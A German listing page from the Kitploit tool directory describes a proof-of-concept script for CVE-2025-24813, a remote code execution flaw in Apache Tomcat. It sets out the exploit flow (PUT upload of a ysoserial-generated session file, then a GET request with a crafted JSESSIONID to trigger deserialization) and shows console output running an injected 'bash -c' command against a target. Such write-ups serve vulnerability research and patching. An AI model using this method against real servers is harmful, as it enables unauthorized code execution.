Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-24813 — Proof-of-Concept-Skript (PoC) für CVE-2025-24813, eine Sicherheitslücke in Apache Tomcat. | Kitploit
Tools/GitHubGitHub/hakankarabacak/cve-2025-24813
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-ToolPayload-Entwicklung
GitHubhakankarabacak/cve-2025-24813

CVE-2025-24813

Proof-of-Concept-Skript (PoC) für CVE-2025-24813, eine Sicherheitslücke in Apache Tomcat.

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-24813

Proof-of-Concept-Skript (PoC) für CVE-2025-24813, eine Schwachstelle in Apache Tomcat.

Das Skript wurde basierend auf dem zugehörigen Link modifiziert und auf meine Bedürfnisse zugeschnitten.

Verwundbare Tomcat-Umgebung einrichten

Die Umgebung basiert auf dem offiziellen Tomcat-9.0.90-Image. Sie entfernt die Schreibschutz-Beschränkung des Servers und konfiguriert ihn so, dass Sitzungsdaten auf der Festplatte gespeichert werden. Anschließend wird die Anwendung automatisch bereitgestellt, indem die Datei ROOT.war in das Verzeichnis webapps/ von Tomcat kopiert wird.

root@kitploit:~
docker build -t cve-2025-24813 .
docker run --name cve-2025-24813 -it -d -p 8080:8080 cve-2025-24813

Ablauf

  1. Eine Datei check.txt mit dem Content-Range-Header wird platziert, um zu prüfen, ob der Server PUT-Anfragen akzeptiert.
  2. Wenn der Server beschreibbar ist, wird mithilfe von ysoserial ein Payload für den gewünschten Befehl erzeugt.
  3. Die bösartige Sitzungsdatei wird per PUT-Anfrage in das Verzeichnis hochgeladen und mit der Sitzungs-ID und dem Dateinamen verknüpft.
  4. Eine GET-Anfrage mit einer benutzerdefinierten JSESSIONID wird gesendet, die eine Deserialisierung auslöst.
  5. Die temporäre Payload-Datei wird aus dem Verzeichnis gelöscht.

Verwendung

root@kitploit:~
$ python3 cve_2025_24813.py

██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ███████╗      ██████╗ ██╗  ██╗ █████╗  ██╗██████╗
██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗██╔════╝      ╚════██╗██║  ██║██╔══██╗███║╚════██╗
██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████╗█████╗ █████╔╝███████║╚█████╔╝╚██║ █████╔╝
██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝██╔═══╝ ╚════██║██╔══██╗ ██║ ╚═══██╗
╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗███████║      ███████╗     ██║╚█████╔╝ ██║██████╔╝
╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚══════╝      ╚══════╝     ╚═╝ ╚════╝  ╚═╝╚═════╝
 
                 --- Apache Tomcat Remote Code Execution PoC by Hakan Karabacak ---

Enter target URL (e.g., http://target.com:8080): http://target.com:8080
Enter command to execute (default: bash -c echo${IFS}$(id)>/tmp/RCE): 
Enter path to ysoserial.jar (default: ysoserial.jar): 
Enter ysoserial gadget chain (default: CommonsCollections6): 
[*] Session ID: hk1337
[+] Server is writable via PUT: http://target.com:8080/check.txt
[*] Generating ysoserial payload for command: bash -c echo${IFS}$(id)>/tmp/RCE
[+] Payload generated successfully: payload.ser
[+] Payload uploaded with status 409 (Conflict): http://target.com:8080/hk1337.session
[+] Exploit succeeded! Server returned 500 after deserialization.
[+] Target http://target.com:8080 is vulnerable to CVE-2025-24813!
[+] Temporary file removed: payload.ser

PoC

https://github.com/user-attachments/assets/5a271e6f-1126-459a-852b-603f39a68616

Tool herunterladen